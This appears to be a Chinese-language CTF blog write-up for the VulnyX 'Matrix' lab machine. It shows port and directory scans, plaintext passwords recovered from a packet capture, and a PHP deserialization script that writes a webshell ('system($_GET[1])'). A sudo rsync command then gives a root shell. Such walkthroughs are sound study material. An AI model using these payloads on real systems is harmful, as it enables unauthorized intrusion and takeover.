vulnyx-Matrix

Vlunyx靶场中的中等难度Linux靶机

信息收集

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/tmp]
└─# nmap -Pn -n -p- 192.168.56.103                                 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-25 22:56 EDT
Nmap scan report for 192.168.56.103
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:EA:04:13 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 20.37 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kali)-[/tmp]
└─# nmap -Pn -n -sCV  -p22,80 192.168.56.103
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-25 22:58 EDT
Nmap scan report for 192.168.56.103
Host is up (0.0012s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey: 
|   256 67:78:c9:d2:e3:ff:be:fc:9e:13:9a:af:9d:59:17:66 (ECDSA)
|_  256 1a:78:b1:e6:f1:f0:d1:b3:ab:c8:3f:95:fd:46:52:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Enter The Matrix
MAC Address: 08:00:27:EA:04:13 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.39 seconds

漏洞发现

web 80

选择RED PILL

会跳转到一个PDF页面。

选择BLUE PILL

会跳转到 google

不过在源码中可以发现提示

fuzz .pcap文件?

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root㉿kali)-[/tmp]
└─# gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://192.168.56.103" --no-error -t 100  -x .pcap                
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.103
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              pcap
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/trinity.pcap         (Status: 200) [Size: 146389]

trinity.pcap

流量包里有很多信息。

从这里可以得到一些用户凭证 

1
2
3
4
5
6
7
8
9
10
11
MAND: rsync --daemon /home/smith/file.txt 192.168.2.100:/backup/smith/
PASSWORD: kT8020e136Z2YLJa2fEZ

MAND: rsync --daemon /home/john/file.txt 192.168.2.100:/backup/john/
PASSWORD: krGVRU2vCedfwjVZXDrp

MAND: rsync --daemon /home/alice/file.txt 192.168.2.100:/backup/alice/
PASSWORD: BgUvmyV0OEgEDpMjpJUv

MAND: rsync --daemon /home/neo/file.txt 192.168.2.100:/backup/neo/
PASSWORD: 2LmQA1WT2Xc4avgGA1yY

其中有一个webp图片,导出为图片。

在其中的HTTP协议中只有一个返回包。跟随流后在其中找到提示

有一个子域名 M47r1X.matrix.nyx

添加 /etc/hosts后访问

继续对子域名进行目录扫描

子域名 目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root㉿kali)-[/tmp]
└─# gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://M47r1X.matrix.nyx/" --no-error -t 100  -x txt,php,zip,bak,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://M47r1X.matrix.nyx/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,zip,bak,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 3440]
/.php                 (Status: 403) [Size: 282]
/.html                (Status: 403) [Size: 282]
/messages.txt         (Status: 200) [Size: 1]
/.html                (Status: 403) [Size: 282]
/.php                 (Status: 403) [Size: 282]

messages.txt

我尝试在页面中输入id

emm,还是一个随机的

php反序列化

filtrate-backend-matrix.php.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php

    class Message
    {
        public $file = "messages.txt";
        public $message = "";
        public function __unserialize(array $data): void
        {
            $file = $data['file'] ?? $this->file;
            $this->message = $data['message'];
            file_put_contents($file, $data['message'] . "\n", FILE_APPEND);
        }
    }

unserialize方法当对象被反序列化时调用,并且存在任意文件写入操作。当然我们必须对file以及message进行可控。

在请求包中,可以发现我们输入的数据会自动进行序列化且 URL 编码。

在前端js中有序列化数据的函数

那么我们可以尝试伪造 data的序列化数据,进行写入木马 。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php


class Message {
    public $file = "messages.txt";
    public $message = "";
    public function __unserialize(array $data){
        file_put_contents($data['file'],$data['message']."\n", FILE_APPEND);
    }
}
$msg = new Message();
$msg->file = '1.phar';
$msg->message = "<?php system(\$_GET[1]);?>";

echo serialize($msg);




成功getshell,反弹shell

权限提升

pcap 密码泄露

从流量包中我们获取到了一些用户的密码。通过/etc/passwd发现存在smith用户。

sudo -l rsync

sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null

1
2
3
4
5
6
7
8
# id
uid=0(root) gid=0(root) grupos=0(root)
# bash           
root@matrix:/var/www/html# cat /root/root.txt 
5f3cae74fbcf1919ccxxxxx
root@matrix:/var/www/html# cat /home/smith/user.txt 
13fd11421e33199c202xxxxx
root@matrix:/var/www/html#
靶机
#渗透
vulnyx-Matrix
https://r3bir7hcx.github.io/2025/04/26/vulnyx-Matrix/
Author
CXCX
Posted on
April 26, 2025
Licensed under